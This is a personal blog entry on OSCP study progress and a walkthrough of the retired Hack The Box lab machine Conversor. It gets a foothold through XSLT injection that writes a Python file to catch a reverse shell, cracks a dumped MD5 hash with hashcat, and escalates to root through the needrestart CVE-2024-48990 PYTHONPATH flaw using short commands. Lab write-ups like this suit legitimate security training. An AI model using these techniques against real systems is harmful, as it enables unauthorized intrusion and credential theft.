It’s May 24th. The last time I touched my OSCP prep was May 8th. Sixteen days lost, first to a brutal exam week, then to whatever virus knocked me flat for a week.

What I did today#

Four HTB Academy Footprinting modules: SMTP, IMAP/POP3, SNMP, and MySQL. Then I rooted Conversor on Hack The Box, an easy retired machine that turned out to be a fun XSLT injection foothold into a needrestart CVE-2024-48990 privesc.

Eight productive hours after sixteen days off.

What stuck#

All of the simple enumeration and privesc stuff I learned early on stuck, hard. I had a foothold within 30 minutes just based on CVEs and good enumeration, and root within an hour and 40 minutes.

The Conversor box#

Recon and foothold#

Initial nmap enumeration showed port 80 open, so I went straight to the front-end. I registered a new user to see what was behind the login wall and found an XML/XSLT upload page that “beautified Nmap scans.” I pretty much immediately googled XSLT Injection on intuition.

The payload I used was based on ex-cal1bur’s XSLT-Injection reverse shell PoC

The ptswarm:document extension element writes the inner content to an arbitrary path on the server. By dropping a Python file into the application’s scripts directory, the next time the app’s processing chain ran it, I caught a reverse shell on port 8080.

User flag#

With a shell on the box, I went looking through the app source for hardcoded secrets and database files. Found a users.db file in the instance directory and dumped it:

cat users.db

That gave me an MD5 hash for a user named fismathack. Cracked it with hashcat:

hashcat -m 0 fismathack.hash /usr/share/wordlists/rockyou.txt

SSH’d in with the cracked credentials and grabbed user.txt.

Privesc: needrestart CVE-2024-48990#

First thing after getting user was sudo -l. needrestart was runnable as NOPASSWD — immediate red flag

The mechanism#

needrestart is a Ubuntu-default tool that scans running processes to determine which need restarting after library updates. CVE-2024-48990, discovered by Qualys in late 2024, exploits the fact that needrestart honors the PYTHONPATH environment variable when executing the Python interpreters of running processes. An attacker who controls PYTHONPATH for any user process can inject a malicious Python module that gets loaded with root privileges when needrestart runs.

Affects needrestart versions before 3.8 on Ubuntu and Ubuntu-derivative systems. Since needrestart is installed by default and runs during package installs, this CVE is relevant on a huge number of real-world machines that haven’t been patched.

Exploitation#

Used pentestfunctions’ PoC. No gcc on the target, so I compiled on my own machine and transferred the binary. From there I followed the steps in the PoC’s bash script manually:

# Compiled malicious shared object locally, transferred to target
# Then on target:
python3 exploit.py
sudo needrestart

Ran needrestart as superuser per the sudo permission and dropped into a root shell. Grabbed root.txt.

What’s next?#

Tomorrow: more Footprinting modules. Another easy retired box if energy allows. I wanna rebuild the rhythm this week, then start moving into TJnull’s easy tier next week.

Three months to OSCP, six months to graduation. Sixteen days off didn’t change that it just made today’s session feel earned.

References#